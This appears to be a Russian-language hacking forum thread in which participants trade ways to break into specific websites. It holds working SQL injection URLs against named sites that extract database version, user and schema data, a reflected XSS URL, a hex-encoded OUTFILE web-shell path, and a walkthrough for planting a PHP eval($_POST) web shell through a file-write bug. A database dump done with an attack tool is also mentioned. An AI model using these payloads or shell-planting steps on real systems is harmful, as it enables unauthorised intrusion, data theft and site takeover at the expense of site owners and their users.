Code: outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E72752F7368656C6C) Хекс не прокатит с OUTFILE. Есть вариант со встроенными запросами.
Ну, судя по страничке, там в коде выполняется print_r($_REQUEST); XSS: http://marafet.net/include/ajax/modules/gallery/voteImage.php?a=%3Cscript%3Ealert(1)%3C/script%3E
Версию и юзера вывел http://protein.7910.org/product_info.php/products_id/125'and(select*from(select(name_const(concat_ws(0x 3a,version(),user()),1)),name_const(concat_ws(0x3a ,version(),user()),1))a)and' Как щас вывести таблицы из information_schema.tables, какой должен быть запрос?
Зачем пытаться проводить инъекцию как в Insert запросах, тем самым усложняя себе жизнь? Что мешало сделать просто вот так: http://protein.7910.org/product_info.php/products_id/126'%20and%201=3%20union%20select%201,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16%20--%20 ?)
есть ли способ выполнить не sql запрос а php код внутри кавычек к примеру такой вариант PHP: <?php $_GET['ID'] = addslashes ($_GET['ID']); //фильтрация $fh = fopen("z:/TEST.PHP","w"); fwrite($fh,"log = "."'".$_GET['ID']."'"); fclose($fh); ?> создаеться файл TEST.PHP с профильтрованным содержимым id
да возможно, так как функция addslashes(); добовляет слешь к ковычкам, а в пхп элементарно даже можно выполнить <? phpinfo(); ?>, вопрос следущий, куда здесь добавиться слешь))
Тока что проверял у себя на локал хосте скрипт, если пораметру id присвоить значение, к примеру "<? phpinfo(); ?>", то в файл TEST.PHP, записывается такая информация "log = '<? phpinfo(); ?>'", следовательно так как сам фаел имеет расширение php и в самом нем прописывается теги на выполнение пхп он и выполняется, попробуй у себя протестировать и все поймешь, у себя на локалхосте я делал так: P.S.: вот намерено вставил в код кавычку и вот что получилось в файле
а, понял о чем, видимо файл юзается как файл настроек. т.е. начало идет прямо с log=' ?) Если да, то круто.
да файл используеться как хранилище настроек но в виде php массива и увы теги php находяться в начале файла и недоступны надежда была только на то что в php есть и другие символы короме кавычки и слеша имеющие особые свойства
И что выйдет из этого? Значение переменной ID попадут в одинарную кавычку, и PHP интерпретатор будет считать это обычным текстом, а не php кодом.
Посмотри код внимательнее, параметр w при открытии файла - соответственно весь файл будет очищен, и создаться файл с текстом: TEST.PHP: PHP: log = '<?php eval($_POST[1]);?>' Ну и открываем файл TEST.PHP в браузере.
Очень интересует что происходит в данном случае? WebCruiser`ом сливаю базу, а она, как видно на скрине идет какими-то закорючками)
http://www.lcoastpress.com/journal.php?id=7+or+1+group+by+concat((select+version()),floor(rand(0)*2))having+min(0)+or+1--+
я понимаю значение етих команд, но не понимаю как и почему такое их скопление работает , хто может обьяснить или где я могу почитать?
